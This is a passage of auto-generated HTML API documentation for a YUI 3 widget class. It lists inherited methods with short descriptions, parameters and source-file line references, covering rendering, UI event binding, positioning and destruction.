<span class="type"><a href="../classes/EventFacade.html" class="crosslink">EventFacade</a></span>
<div class="param-description">
<p>The event facade for the attribute change</p>
</div>
</li>
</ul>
</div>
</div>
<div id="method__aggregateAttrs" class="method item private inherited">
<h3 class="name"><code>_aggregateAttrs</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>allAttrs</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="returns-inline">
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Object" class="crosslink external" target="_blank">Object</a></span>
</span>
<span class="flag private">private</span>
<div class="meta">
<p>Inherited from
<a href="../classes/BaseCore.html#method__aggregateAttrs">BaseCore</a>:
<a href="../files/base_js_BaseCore.js.html#l427"><code>base/js/BaseCore.js:427</code></a>
</p>
</div>
<div class="description">
<p>A helper method, used by _initHierarchyData to aggregate
attribute configuration across the instances class hierarchy.</p>
<p>The method will protect the attribute configuration value to protect the statically defined
default value in ATTRS if required (if the value is an object literal, array or the
attribute configuration has cloneDefaultValue set to shallow or deep).</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">allAttrs</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Array" class="crosslink external" target="_blank">Array</a></span>
<div class="param-description">
<p>An array of ATTRS definitions across classes in the hierarchy
(subclass first, Base last)</p>
</div>
</li>
</ul>
</div>
<div class="returns">
<h4>Returns:</h4>
<div class="returns-description">
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Object" class="crosslink external" target="_blank">Object</a></span>:
The aggregate set of ATTRS definitions for the instance
</div>
</div>
</div>
<div id="method__applyParsedConfig" class="method item protected inherited">
<h3 class="name"><code>_applyParsedConfig</code></h3>
<span class="paren">()</span>
<span class="returns-inline">
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Object" class="crosslink external" target="_blank">Object</a></span>
</span>
<span class="flag protected">protected</span>
<div class="meta">
<p>Inherited from
<a href="../classes/Widget.html#method__applyParsedConfig">Widget</a>:
<a href="../files/widget_js_WidgetHTMLParser.js.html#l83"><code>widget/js/WidgetHTMLParser.js:83</code></a>
</p>
</div>
<div class="description">
</div>
<div class="returns">
<h4>Returns:</h4>
<div class="returns-description">
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Object" class="crosslink external" target="_blank">Object</a></span>:
The merged configuration literal
</div>
</div>
</div>
<div id="method__applyParser" class="method item protected inherited">
<h3 class="name"><code>_applyParser</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>config</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="flag protected">protected</span>
<div class="meta">
<p>Inherited from
<a href="../classes/Widget.html#method__applyParser">Widget</a>:
<a href="../files/widget_js_WidgetHTMLParser.js.html#l92"><code>widget/js/WidgetHTMLParser.js:92</code></a>
</p>
</div>
<div class="description">
<p>Utility method used to apply the <code>HTML_PARSER</code> configuration for the
instance, to retrieve config data values.</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">config</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Object" class="crosslink external" target="_blank">Object</a></span>
<div class="param-description">
<p>User configuration object (will be populated with values from Node)</p>
</div>
</li>
</ul>
</div>
</div>
<div id="method__applyStdModParsedConfig" class="method item private inherited">
<h3 class="name"><code>_applyStdModParsedConfig</code></h3>
<span class="paren">()</span>
<span class="flag private">private</span>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetStdMod.html#method__applyStdModParsedConfig">WidgetStdMod</a>:
<a href="../files/widget-stdmod_js_Widget-StdMod.js.html#l637"><code>widget-stdmod/js/Widget-StdMod.js:637</code></a>
</p>
</div>
<div class="description">
<p>This method is injected before the <em>applyParsedConfig step in
the application of HTML</em>PARSER, and sets up the state to
identify whether or not we should remove the current DOM content
or not, based on whether or not the current content attribute value
was extracted from the DOM, or provided by the user configuration</p>
</div>
</div>
<div id="method__attachPosAlignUIHandles" class="method item protected inherited">
<h3 class="name"><code>_attachPosAlignUIHandles</code></h3>
<span class="paren">()</span>
<span class="flag protected">protected</span>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetPositionAlign.html#method__attachPosAlignUIHandles">WidgetPositionAlign</a>:
<a href="../files/widget-position-align_js_Widget-PositionAlign.js.html#l458"><code>widget-position-align/js/Widget-PositionAlign.js:458</code></a>
</p>
</div>
<div class="description">
<p>Attaches the alignment-syncing event handlers.</p>
</div>
</div>
<div id="method__attachUIHandlesAutohide" class="method item protected inherited">
<h3 class="name"><code>_attachUIHandlesAutohide</code></h3>
<span class="paren">()</span>
<span class="flag protected">protected</span>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetAutohide.html#method__attachUIHandlesAutohide">WidgetAutohide</a>:
<a href="../files/widget-autohide_js_Widget-Autohide.js.html#l143"><code>widget-autohide/js/Widget-Autohide.js:143</code></a>
</p>
</div>
<div class="description">
<p>Iterates through all objects in the hideOn attribute and creates event listeners.</p>
</div>
</div>
<div id="method__attachUIHandlesModal" class="method item inherited">
<h3 class="name"><code>_attachUIHandlesModal</code></h3>
<span class="paren">()</span>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetModality.html#method__attachUIHandlesModal">WidgetModality</a>:
<a href="../files/widget-modality_js_Widget-Modality.js.html#l383"><code>widget-modality/js/Widget-Modality.js:383</code></a>
</p>
</div>
<div class="description">
<p>Attaches UI Listeners for "clickoutside" and "focusoutside" on the
widget. When these events occur, and the widget is modal, focus is
shifted back onto the widget.</p>
</div>
</div>
<div id="method__attrCfgHash" class="method item private inherited">
<h3 class="name"><code>_attrCfgHash</code></h3>
<span class="paren">()</span>
<span class="flag private">private</span>
<div class="meta">
<p>Inherited from
<a href="../classes/BaseCore.html#method__attrCfgHash">
BaseCore
</a>
but overwritten in
<a href="../files/base_js_Base.js.html#l180"><code>base/js/Base.js:180</code></a>
</p>
</div>
<div class="description">
<p>Utility method to define the attribute hash used to filter/whitelist property mixes for
this class.</p>
</div>
</div>
<div id="method__baseDestroy" class="method item private inherited">
<h3 class="name"><code>_baseDestroy</code></h3>
<span class="paren">()</span>
<span class="flag private">private</span>
<div class="meta">
<p>Inherited from
<a href="../classes/BaseCore.html#method__baseDestroy">BaseCore</a>:
<a href="../files/base_js_BaseCore.js.html#l264"><code>base/js/BaseCore.js:264</code></a>
</p>
</div>
<div class="description">
<p>Internal destroy implementation for BaseCore</p>
</div>
</div>
<div id="method__baseInit" class="method item private inherited">
<h3 class="name"><code>_baseInit</code></h3>
<span class="paren">()</span>
<span class="flag private">private</span>
<div class="meta">
<p>Inherited from
<a href="../classes/BaseCore.html#method__baseInit">BaseCore</a>:
<a href="../files/base_js_BaseCore.js.html#l236"><code>base/js/BaseCore.js:236</code></a>
</p>
</div>
<div class="description">
<p>Internal initialization implementation for BaseCore</p>
</div>
</div>
<div id="method__bindAttrUI" class="method item private inherited">
<h3 class="name"><code>_bindAttrUI</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>attrs</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="flag private">private</span>
<div class="meta">
<p>Inherited from
<a href="../classes/Widget.html#method__bindAttrUI">Widget</a>:
<a href="../files/widget_js_Widget.js.html#l1168"><code>widget/js/Widget.js:1168</code></a>
</p>
</div>
<div class="description">
<p>Binds after listeners for the list of attributes provided</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">attrs</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Array" class="crosslink external" target="_blank">Array</a></span>
<div class="param-description">
</div>
</li>
</ul>
</div>
</div>
<div id="method__bindDOM" class="method item protected inherited">
<h3 class="name"><code>_bindDOM</code></h3>
<span class="paren">()</span>
<span class="flag protected">protected</span>
<div class="meta">
<p>Inherited from
<a href="../classes/Widget.html#method__bindDOM">Widget</a>:
<a href="../files/widget_js_Widget.js.html#l900"><code>widget/js/Widget.js:900</code></a>
</p>
</div>
<div class="description">
<p>Sets up DOM listeners, on elements rendered by the widget.</p>
</div>
</div>
<div id="method__bindUI" class="method item protected inherited">
<h3 class="name"><code>_bindUI</code></h3>
<span class="paren">()</span>
<span class="flag protected">protected</span>
<div class="meta">
<p>Inherited from
<a href="../classes/Widget.html#method__bindUI">Widget</a>:
<a href="../files/widget_js_Widget.js.html#l881"><code>widget/js/Widget.js:881</code></a>
</p>
</div>
<div class="description">
<p>Sets up DOM and CustomEvent listeners for the widget.</p>
</div>
</div>
<div id="method__bindUIAutohide" class="method item protected inherited">
<h3 class="name"><code>_bindUIAutohide</code></h3>
<span class="paren">()</span>
<span class="flag protected">protected</span>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetAutohide.html#method__bindUIAutohide">WidgetAutohide</a>:
<a href="../files/widget-autohide_js_Widget-Autohide.js.html#l95"><code>widget-autohide/js/Widget-Autohide.js:95</code></a>
</p>
</div>
<div class="description">
<p>Binds event listeners to the widget.</p>
<p>
This method in invoked after bindUI is invoked for the Widget class
using YUI's aop infrastructure.
</p>
</div>
</div>
<div id="method__bindUIButtons" class="method item protected inherited">
<h3 class="name"><code>_bindUIButtons</code></h3>
<span class="paren">()</span>
<span class="flag protected">protected</span>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetButtons.html#method__bindUIButtons">WidgetButtons</a>:
<a href="../files/widget-buttons_js_widget-buttons.js.html#l496"><code>widget-buttons/js/widget-buttons.js:496</code></a>
</p>
<p>Available since 3.4.0</p>
</div>
<div class="description">
<p>Binds UI event listeners. This method is inserted via AOP, and will execute
after <code>bindUI()</code>.</p>
</div>
</div>
<div id="method__bindUIChild" class="method item protected inherited">
<h3 class="name"><code>_bindUIChild</code></h3>
<span class="paren">()</span>
<span class="flag protected">protected</span>
<div class="meta">
<p>Inherited from
<a href="../classes/Widget.html#method__bindUIChild">Widget</a>:
<a href="../files/widget-child_js_Widget-Child.js.html#l356"><code>widget-child/js/Widget-Child.js:356</code></a>
</p>
</div>
<div class="description">
<p>Binds event listeners responsible for updating the UI state in response
to WidgetChild related state changes.</p>
<p>
This method is invoked after bindUI is invoked for the Widget class
using YUI's aop infrastructure.
</p>
</div>
</div>
<div id="method__bindUIModal" class="method item protected inherited">
<h3 class="name"><code>_bindUIModal</code></h3>
<span class="paren">()</span>
<span class="flag protected">protected</span>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetModality.html#method__bindUIModal">WidgetModality</a>:
<a href="../files/widget-modality_js_Widget-Modality.js.html#l223"><code>widget-modality/js/Widget-Modality.js:223</code></a>
</p>
</div>
<div class="description">
<p>Hooks up methods to be executed when the widget's visibility or z-index changes</p>
<p>
This method in invoked after bindUI is invoked for the Widget class
using YUI's aop infrastructure.
</p>
</div>
</div>
<div id="method__bindUIPosAlign" class="method item protected inherited">
<h3 class="name"><code>_bindUIPosAlign</code></h3>
<span class="paren">()</span>
<span class="flag protected">protected</span>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetPositionAlign.html#method__bindUIPosAlign">WidgetPositionAlign</a>:
<a href="../files/widget-position-align_js_Widget-PositionAlign.js.html#l238"><code>widget-position-align/js/Widget-PositionAlign.js:238</code></a>
</p>
</div>
<div class="description">
<p>Bind event listeners responsible for updating the UI state in response to
the widget's position-align related state changes.</p>
<p>This method is invoked after <code>bindUI</code> has been invoked for the <code>Widget</code>
class using the AOP infrastructure.</p>
</div>
</div>
<div id="method__bindUIPosConstrained" class="method item protected inherited">
<h3 class="name"><code>_bindUIPosConstrained</code></h3>
<span class="paren">()</span>
<span class="flag protected">protected</span>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetPositionConstrain.html#method__bindUIPosConstrained">WidgetPositionConstrain</a>:
<a href="../files/widget-position-constrain_js_Widget-PositionConstrain.js.html#l259"><code>widget-position-constrain/js/Widget-PositionConstrain.js:259</code></a>
</p>
</div>
<div class="description">
<p>Binds event listeners responsible for updating the UI state in response to
Widget constrained positioning related state changes.</p>
<p>
This method is invoked after bindUI is invoked for the Widget class
using YUI's aop infrastructure.
</p>
</div>
</div>
<div id="method__bindUIPosition" class="method item protected inherited">
<h3 class="name"><code>_bindUIPosition</code></h3>
<span class="paren">()</span>
<span class="flag protected">protected</span>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetPosition.html#method__bindUIPosition">WidgetPosition</a>:
<a href="../files/widget-position_js_Widget-Position.js.html#l143"><code>widget-position/js/Widget-Position.js:143</code></a>
</p>
</div>
<div class="description">
<p>Binds event listeners responsible for updating the UI state in response to
Widget position related state changes.</p>
<p>
This method in invoked after bindUI is invoked for the Widget class
using YUI's aop infrastructure.
</p>
</div>
</div>
<div id="method__bindUIStack" class="method item protected inherited">
<h3 class="name"><code>_bindUIStack</code></h3>
<span class="paren">()</span>
<span class="flag protected">protected</span>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetStack.html#method__bindUIStack">WidgetStack</a>:
<a href="../files/widget-stack_js_Widget-Stack.js.html#l155"><code>widget-stack/js/Widget-Stack.js:155</code></a>
</p>
</div>
<div class="description">
<p>Binds event listeners responsible for updating the UI state in response to
Widget stack related state changes.</p>
<p>
This method is invoked after bindUI is invoked for the Widget class
using YUI's aop infrastructure.
</p>
</div>
</div>
<div id="method__bindUIStdMod" class="method item protected inherited">
<h3 class="name"><code>_bindUIStdMod</code></h3>
<span class="paren">()</span>
<span class="flag protected">protected</span>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetStdMod.html#method__bindUIStdMod">WidgetStdMod</a>:
<a href="../files/widget-stdmod_js_Widget-StdMod.js.html#l310"><code>widget-stdmod/js/Widget-StdMod.js:310</code></a>
</p>
</div>
<div class="description">
<p>Binds event listeners responsible for updating the UI state in response to
Widget standard module related state changes.</p>
<p>
This method is invoked after bindUI is invoked for the Widget class
using YUI's aop infrastructure.
</p>
</div>
</div>
<div id="method__blur" class="method item inherited">
<h3 class="name"><code>_blur</code></h3>
<span class="paren">()</span>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetModality.html#method__blur">WidgetModality</a>:
<a href="../files/widget-modality_js_Widget-Modality.js.html#l282"><code>widget-modality/js/Widget-Modality.js:282</code></a>
</p>
</div>
<div class="description">
<p>Blurs the widget.</p>
</div>
</div>
<div id="method__constrain" class="method item protected inherited">
<h3 class="name"><code>_constrain</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>val</code>
</li>
<li class="arg">
<code>axis</code>
</li>
<li class="arg">
<code>nodeRegion</code>
</li>
<li class="arg">
<code>constrainingRegion</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="returns-inline">
<span class="type"><a href="../classes/Number.html" class="crosslink">Number</a></span>
</span>
<span class="flag protected">protected</span>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetPositionConstrain.html#method__constrain">WidgetPositionConstrain</a>:
<a href="../files/widget-position-constrain_js_Widget-PositionConstrain.js.html#l164"><code>widget-position-constrain/js/Widget-PositionConstrain.js:164</code></a>
</p>
</div>
<div class="description">
<p>The method which performs the actual constrain calculations for a given axis ("x" or "y") based
on the regions provided.</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">val</code>
<span class="type"><a href="../classes/Number.html" class="crosslink">Number</a></span>
<div class="param-description">
<p>The value to constrain</p>
</div>
</li>
<li class="param">
<code class="param-name">axis</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="param-description">
<p>The axis to use for constrainment</p>
</div>
</li>
<li class="param">
<code class="param-name">nodeRegion</code>
<span class="type">Region</span>
<div class="param-description">
<p>The region of the node to constrain</p>
</div>
</li>
<li class="param">
<code class="param-name">constrainingRegion</code>
<span class="type">Region</span>
<div class="param-description">
<p>The region of the node (or viewport) to constrain to</p>
</div>
</li>
</ul>
</div>
<div class="returns">
<h4>Returns:</h4>
<div class="returns-description">
<span class="type"><a href="../classes/Number.html" class="crosslink">Number</a></span>:
The constrained value
</div>
</div>
</div>
<div id="method__constrainOnXYChange" class="method item protected inherited">
<h3 class="name"><code>_constrainOnXYChange</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>e</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="flag protected">protected</span>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetPositionConstrain.html#method__constrainOnXYChange">WidgetPositionConstrain</a>:
<a href="../files/widget-position-constrain_js_Widget-PositionConstrain.js.html#l305"><code>widget-position-constrain/js/Widget-PositionConstrain.js:305</code></a>
</p>
</div>
<div class="description">
<p>The on change listener for the "xy" attribute. Modifies the event facade's
newVal property with the constrained XY value.</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">e</code>
<span class="type"><a href="../classes/EventFacade.html" class="crosslink">EventFacade</a></span>
<div class="param-description">
<p>The event facade for the attribute change</p>
</div>
</li>
</ul>
</div>
</div>
<div id="method__createButton" class="method item protected inherited">
<h3 class="name"><code>_createButton</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>button</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="returns-inline">
<span class="type"><a href="../classes/Node.html" class="crosslink">Node</a></span>
</span>
<span class="flag protected">protected</span>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetButtons.html#method__createButton">WidgetButtons</a>:
<a href="../files/widget-buttons_js_widget-buttons.js.html#l516"><code>widget-buttons/js/widget-buttons.js:516</code></a>
</p>
<p>Available since 3.5.0</p>
</div>
<div class="description">
<p>Returns a button node based on the specified <code>button</code> node or configuration.</p>
<p>The button node will either be created via <code>Y.Plugin.Button.createNode()</code>,
or when <code>button</code> is specified as a node already, it will by <code>plug()</code>ed with
<code>Y.Plugin.Button</code>.</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">button</code>
<span class="type"><a href="../classes/Node.html" class="crosslink">Node</a> | <a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Object" class="crosslink external" target="_blank">Object</a></span>
<div class="param-description">
<p>Button node or configuration object.</p>
</div>
</li>
</ul>
</div>
<div class="returns">
<h4>Returns:</h4>
<div class="returns-description">
<span class="type"><a href="../classes/Node.html" class="crosslink">Node</a></span>:
The button node.
</div>
</div>
</div>
<div id="method__createUIEvent" class="method item private inherited">
<h3 class="name"><code>_createUIEvent</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>type</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="flag private">private</span>
<div class="meta">
<p>Inherited from
<a href="../classes/Widget.html#method__createUIEvent">Widget</a>:
<a href="../files/widget_js_WidgetUIEvents.js.html#l73"><code>widget/js/WidgetUIEvents.js:73</code></a>
</p>
</div>
<div class="description">
<p>Binds a delegated DOM event listener of the specified type to the
Widget's outtermost DOM element to facilitate the firing of a Custom
Event of the same type for the Widget instance.</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">type</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="param-description">
<p>String representing the name of the event</p>
</div>
</li>
</ul>
</div>
</div>
<div id="method__defAttrChangeFn" class="method item private inherited">
<h3 class="name"><code>_defAttrChangeFn</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>e</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="flag private">private</span>
<div class="meta">
<p>Inherited from
<a href="../classes/AttributeEvents.html#method__defAttrChangeFn">AttributeEvents</a>:
<a href="../files/attribute_js_AttributeEvents.js.html#l169"><code>attribute/js/AttributeEvents.js:169</code></a>
</p>
</div>
<div class="description">
<p>Default function for attribute change events.</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">e</code>
<span class="type"><a href="../classes/EventFacade.html" class="crosslink">EventFacade</a></span>
<div class="param-description">
<p>The event object for attribute change events.</p>
</div>
</li>
</ul>
</div>
</div>
<div id="method__defaultCB" class="method item protected inherited">
<h3 class="name"><code>_defaultCB</code></h3>
<span class="paren">()</span>
<span class="flag protected">protected</span>
<div class="meta">
<p>Inherited from
<a href="../classes/Widget.html#method__defaultCB">Widget</a>:
<a href="../files/widget_js_Widget.js.html#l778"><code>widget/js/Widget.js:778</code></a>
</p>
</div>
<div class="description">
<p>Returns the default value for the contentBox attribute. </p>
<p>For the Widget class, this will be the srcNode if provided, otherwise null (resulting in
a new contentBox node instance being created)</p>
</div>
</div>
<div id="method__defDestroyFn" class="method item protected inherited">
<h3 class="name"><code>_defDestroyFn</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>e</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="flag protected">protected</span>
<div class="meta">
<p>Inherited from
<a href="../classes/Base.html#method__defDestroyFn">Base</a>:
<a href="../files/base_js_Base.js.html#l325"><code>base/js/Base.js:325</code></a>
</p>
</div>
<div class="description">
<p>Default destroy event handler</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">e</code>
<span class="type"><a href="../classes/EventFacade.html" class="crosslink">EventFacade</a></span>
<div class="param-description">
<p>Event object</p>
</div>
</li>
</ul>
</div>
</div>
<div id="method__defInitFn" class="method item protected inherited">
<h3 class="name"><code>_defInitFn</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>e</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="flag protected">protected</span>
<div class="meta">
<p>Inherited from
<a href="../classes/Base.html#method__defInitFn">Base</a>:
<a href="../files/base_js_Base.js.html#l313"><code>base/js/Base.js:313</code></a>
</p>
</div>
<div class="description">
<p>Default init event handler</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">e</code>
<span class="type"><a href="../classes/EventFacade.html" class="crosslink">EventFacade</a></span>
<div class="param-description">
<p>Event object, with a cfg property which
refers to the configuration object passed to the constructor.</p>
</div>
</li>
</ul>
</div>
</div>
<div id="method__defRenderFn" class="method item protected inherited">
<h3 class="name"><code>_defRenderFn</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>e</code>
</li>
<li class="arg">
<code>parentNode</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="flag protected">protected</span>
<div class="meta">
<p>Inherited from
<a href="../classes/Widget.html#method__defRenderFn">Widget</a>:
<a href="../files/widget_js_Widget.js.html#l569"><code>widget/js/Widget.js:569</code></a>
</p>
</div>
<div class="description">
<p>Default render handler</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">e</code>
<span class="type"><a href="../classes/EventFacade.html" class="crosslink">EventFacade</a></span>
<div class="param-description">
<p>The Event object</p>
</div>
</li>
<li class="param">
<code class="param-name">parentNode</code>
<span class="type"><a href="../classes/Node.html" class="crosslink">Node</a></span>
<div class="param-description">
<p>The parent node to render to, if passed in to the <code>render</code> method</p>
</div>
</li>
</ul>
</div>
</div>
<div id="method__destroyBox" class="method item protected inherited">
<h3 class="name"><code>_destroyBox</code></h3>
<span class="paren">()</span>
<span class="flag protected">protected</span>
<div class="meta">
<p>Inherited from
<a href="../classes/Widget.html#method__destroyBox">Widget</a>:
<a href="../files/widget_js_Widget.js.html#l475"><code>widget/js/Widget.js:475</code></a>
</p>
</div>
<div class="description">
<p>Removes and destroys the widgets rendered boundingBox, contentBox,
and detaches bound UI events.</p>
</div>
</div>
<div id="method__destroyHierarchy" class="method item private inherited">
<h3 class="name"><code>_destroyHierarchy</code></h3>
<span class="paren">()</span>
<span class="flag private">private</span>
<div class="meta">
<p>Inherited from
<a href="../classes/BaseCore.html#method__destroyHierarchy">BaseCore</a>:
<a href="../files/base_js_BaseCore.js.html#l563"><code>base/js/BaseCore.js:563</code></a>
</p>
</div>
<div class="description">
<p>Destroys the class hierarchy for this instance by invoking
the destructor method on the prototype of each class in the hierarchy.</p>
</div>
</div>
<div id="method__destroyShim" class="method item private inherited">
<h3 class="name"><code>_destroyShim</code></h3>
<span class="paren">()</span>
<span class="flag private">private</span>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetStack.html#method__destroyShim">WidgetStack</a>:
<a href="../files/widget-stack_js_Widget-Stack.js.html#l387"><code>widget-stack/js/Widget-Stack.js:387</code></a>
</p>
</div>
<div class="description">
<p>Removes the shim from the DOM, and detaches any related event
listeners.</p>
</div>
</div>
<div id="method__destroyUIEvents" class="method item private inherited">
<h3 class="name"><code>_destroyUIEvents</code></h3>
<span class="paren">()</span>
<span class="flag private">private</span>
<div class="meta">
<p>Inherited from
<a href="../classes/Widget.html#method__destroyUIEvents">Widget</a>:
<a href="../files/widget_js_WidgetUIEvents.js.html#l20"><code>widget/js/WidgetUIEvents.js:20</code></a>
</p>
</div>
<div class="description">
<p>Destructor logic for UI event infrastructure,
invoked during Widget destruction.</p>
</div>
</div>
<div id="method__detachPosAlignUIHandles" class="method item protected inherited">
<h3 class="name"><code>_detachPosAlignUIHandles</code></h3>
<span class="paren">()</span>
<span class="flag protected">protected</span>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetPositionAlign.html#method__detachPosAlignUIHandles">WidgetPositionAlign</a>:
<a href="../files/widget-position-align_js_Widget-PositionAlign.js.html#l486"><code>widget-position-align/js/Widget-PositionAlign.js:486</code></a>
</p>
</div>
<div class="description">
<p>Detaches the alignment-syncing event handlers.</p>
</div>
</div>
<div id="method__detachStackHandles" class="method item private inherited">
<h3 class="name"><code>_detachStackHandles</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>String</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="flag private">private</span>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetStack.html#method__detachStackHandles">WidgetStack</a>:
<a href="../files/widget-stack_js_Widget-Stack.js.html#l350"><code>widget-stack/js/Widget-Stack.js:350</code></a>
</p>
</div>
<div class="description">
<p>Detaches any handles stored for the provided key</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">String</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Object" class="crosslink external" target="_blank">Object</a></span>
<div class="param-description">
<p>handleKey The key defining the group of handles which should be detached</p>
</div>
</li>
</ul>
</div>
</div>
<div id="method__detachUIHandlesAutohide" class="method item protected inherited">
<h3 class="name"><code>_detachUIHandlesAutohide</code></h3>
<span class="paren">()</span>
<span class="flag protected">protected</span>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetAutohide.html#method__detachUIHandlesAutohide">WidgetAutohide</a>:
<a href="../files/widget-autohide_js_Widget-Autohide.js.html#l192"><code>widget-autohide/js/Widget-Autohide.js:192</code></a>
</p>
</div>
<div class="description">
<p>Detaches all event listeners created by this extension</p>
</div>
</div>
<div id="method__detachUIHandlesModal" class="method item inherited">
<h3 class="name"><code>_detachUIHandlesModal</code></h3>
<span class="paren">()</span>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetModality.html#method__detachUIHandlesModal">WidgetModality</a>:
<a href="../files/widget-modality_js_Widget-Modality.js.html#l442"><code>widget-modality/js/Widget-Modality.js:442</code></a>
</p>
</div>
<div class="description">
<p>Detaches all UI Listeners that were set in _attachUIHandlesModal from the widget.</p>
</div>
</div>
<div id="method__doAlign" class="method item private inherited">
<h3 class="name"><code>_doAlign</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>widgetPoint</code>
</li>
<li class="arg">
<code>x</code>
</li>
<li class="arg">
<code>y</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="flag private">private</span>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetPositionAlign.html#method__doAlign">WidgetPositionAlign</a>:
<a href="../files/widget-position-align_js_Widget-PositionAlign.js.html#l502"><code>widget-position-align/js/Widget-PositionAlign.js:502</code></a>
</p>
</div>
<div class="description">
<p>Helper method, used to align the given point on the widget, with the XY page
coordinates provided.</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">widgetPoint</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="param-description">
<p>Supported point constant
(e.g. WidgetPositionAlign.TL)</p>
</div>
</li>
<li class="param">
<code class="param-name">x</code>
<span class="type"><a href="../classes/Number.html" class="crosslink">Number</a></span>
<div class="param-description">
<p>X page coordinate to align to.</p>
</div>
</li>
<li class="param">
<code class="param-name">y</code>
<span class="type"><a href="../classes/Number.html" class="crosslink">Number</a></span>
<div class="param-description">
<p>Y page coordinate to align to.</p>
</div>
</li>
</ul>
</div>
</div>
<div id="method__eraseStdMod" class="method item protected inherited">
<h3 class="name"><code>_eraseStdMod</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>section</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="flag protected">protected</span>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetStdMod.html#method__eraseStdMod">WidgetStdMod</a>:
